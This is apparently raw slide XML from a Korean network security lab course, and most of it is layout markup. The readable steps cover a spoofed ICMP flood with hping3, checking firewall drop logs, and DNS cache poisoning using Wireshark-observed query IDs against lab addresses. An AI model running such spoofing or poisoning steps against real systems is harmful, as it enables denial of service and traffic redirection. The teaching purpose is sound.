            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="그림 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2EC6FA7-4498-4570-9B21-75490F642E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724680" y="2334397"/>
            <a:ext cx="2574664" cy="2735580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="그림 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4653D5-2E18-4895-9B26-24D34689A3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776915" y="3198113"/>
            <a:ext cx="4816822" cy="2373820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="직사각형 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692609C5-9B2A-43F5-B84C-1C472EA3B1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776914" y="3746501"/>
            <a:ext cx="4750621" cy="212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6F5615FE-16A6-4D74-9CF8-10323D928F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776914" y="4553212"/>
            <a:ext cx="4750621" cy="2120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6263554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서버를 대상으로 데이터 크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>플러딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # hping3 –a 192.168.99.11 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –d 100 10.10.1.101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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.99.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷이 나가는지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197186992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F798C4-9547-4C81-837C-47E9F3021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43233"/>
            <a:ext cx="54006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197192032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4955B429-37DD-42D9-9F37-B585ADCC3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84" y="2431868"/>
            <a:ext cx="5400675" cy="23209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36A681B-7B62-4DF6-B54B-133E044543EF}"/>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4" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25F164B-9269-498B-B06F-55D47B03D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3524" y="943233"/>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0171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25844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5121" name="_x197188192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FCA90A-682C-45B5-9784-F4332E2470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80" y="934995"/>
            <a:ext cx="5400675" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22CAD37-D98B-4716-8D1A-B5AD6A94AFCE}"/>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9323579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공격자가 현재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FD9CA133-CDC3-42B0-8A32-4B3B8D6A50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3488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err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</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err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 확인</a:t>
            </a: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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>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197190112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635AA4A-42BE-4713-8D61-6772DBCDB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9622"/>
            <a:ext cx="5400675" cy="36433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197190192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2A8B92-7AFA-4DAF-80B5-1C187FC17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679622"/>
            <a:ext cx="5400675" cy="3698875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6149" name="_x197189472">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4338795-C9B2-4338-8BED-76AA97A87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4984484"/>
            <a:ext cx="5295900" cy="44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557283"/>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956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실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>되는 패킷을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># tail –f /var/log/message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197190032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA0C41A-5B19-4DF4-BF64-A7218AEDD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10281"/>
            <a:ext cx="3573463" cy="160338"/>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197188592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2408CFBA-BA48-420E-8CFA-FB6F9E82C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80" y="1135933"/>
            <a:ext cx="5400675" cy="4418013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7173" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DFA826-4DDC-45BE-9B15-1CCB6D342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757" y="933300"/>
            <a:ext cx="53260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7175" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A566C9-EA6C-4436-9FD6-CCE738E6B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2023533"/>
            <a:ext cx="5400675" cy="30257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30512B-1FD6-4022-AA7E-A2FEDB1B8E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="5303756"/>
            <a:ext cx="5616792" cy="1185241"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7177" name="_x197191792">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A45113-677B-4426-9605-56BCF540D8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757" y="5575184"/>
            <a:ext cx="3246438" cy="42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3719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보인다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서버의 캐시를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오염시키시오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도메인에 대한 네임 서버를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7958413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패킷 캡처 도구인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 패킷 캡처 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Application -&gt; 09 – Sniffing &amp; Spoofing -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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eth0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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 쿼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 확인하기 위하여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명령으로 일부 호스트의 주소 조회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> www.navy.ac.kr 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 www.navy.ac.kr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48552432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F2CEAC-A054-4028-9C6C-02F4767B1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146" y="926756"/>
            <a:ext cx="3411538" cy="2989263"/>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197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064748F7-B3EE-4002-BEEE-371CF25FDF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4" t="15539" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1350586" y="4333103"/>
            <a:ext cx="3699863" cy="2050098"/>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197190272">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F48267-B84B-4D61-B29B-A4EF960150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52316"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7900086" y="1338649"/>
            <a:ext cx="2403475" cy="928688"/>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197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D839C98-B0AF-4E88-B2F1-A98E8D9DF1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58638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6967378" y="2412204"/>
            <a:ext cx="4362450" cy="2033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표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8643CADF-ABB5-484B-9E24-87FFB6DEB086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326482925"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6320247" y="4594322"/>
          <a:ext cx="5328158" cy="736600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3611293521"/>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FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>!</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465211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="167640" marR="0" indent="-16764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오염시킬 호스트에 미리 접속하면</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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실제 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>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서버에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>캐싱되므로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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공격을 성공시킬 수 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a: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375248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39340571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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 캡처한 패킷들 중 로컬 네트워크의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.0.2.6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 보낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(queries)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>www.navy.ac.kr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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xb8a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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 name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE680142-7F58-42C6-9B8F-5CB4311B8A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488401453"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="536439" y="529780"/>
          <a:ext cx="5328158" cy="4394200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="415428346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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</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4251996"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3989959">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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칼리 리눅스의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 주소를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10.10.1.14(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 대상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rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
